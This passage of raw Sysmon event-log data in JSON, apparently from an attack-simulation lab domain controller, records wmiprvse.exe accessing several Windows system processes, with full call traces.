(x86)\\nxlog\\nxlog.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5640,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.719\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010A4C10200}\r\nTargetProcessId: 1980\r\nTargetImage: C:\\Windows\\system32\\dfssvc.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.719","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010A4C10200}","TargetProcessId":"1980","TargetImage":"C:\\Windows\\system32\\dfssvc.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5641,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.719\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010A7CD0200}\r\nTargetProcessId: 3244\r\nTargetImage: C:\\Windows\\system32\\wbem\\unsecapp.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.719","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010A7CD0200}","TargetProcessId":"3244","TargetImage":"C:\\Windows\\system32\\wbem\\unsecapp.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5642,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.719\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010A7E40200}\r\nTargetProcessId: 3420\r\nTargetImage: C:\\Windows\\System32\\vds.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.719","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010A7E40200}","TargetProcessId":"3420","TargetImage":"C:\\Windows\\System32\\vds.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5643,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.719\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-01C7-5F25-0000-001063890300}\r\nTargetProcessId: 4004\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.719","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-01C7-5F25-0000-001063890300}","TargetProcessId":"4004","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5644,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.719\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-01DD-5F25-0000-00102C560400}\r\nTargetProcessId: 4104\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.719","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-01DD-5F25-0000-00102C560400}","TargetProcessId":"4104","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5645,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.719\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-01DD-5F25-0000-0010D9560400}\r\nTargetProcessId: 4116\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.719","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-01DD-5F25-0000-0010D9560400}","TargetProcessId":"4116","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5646,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.719\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 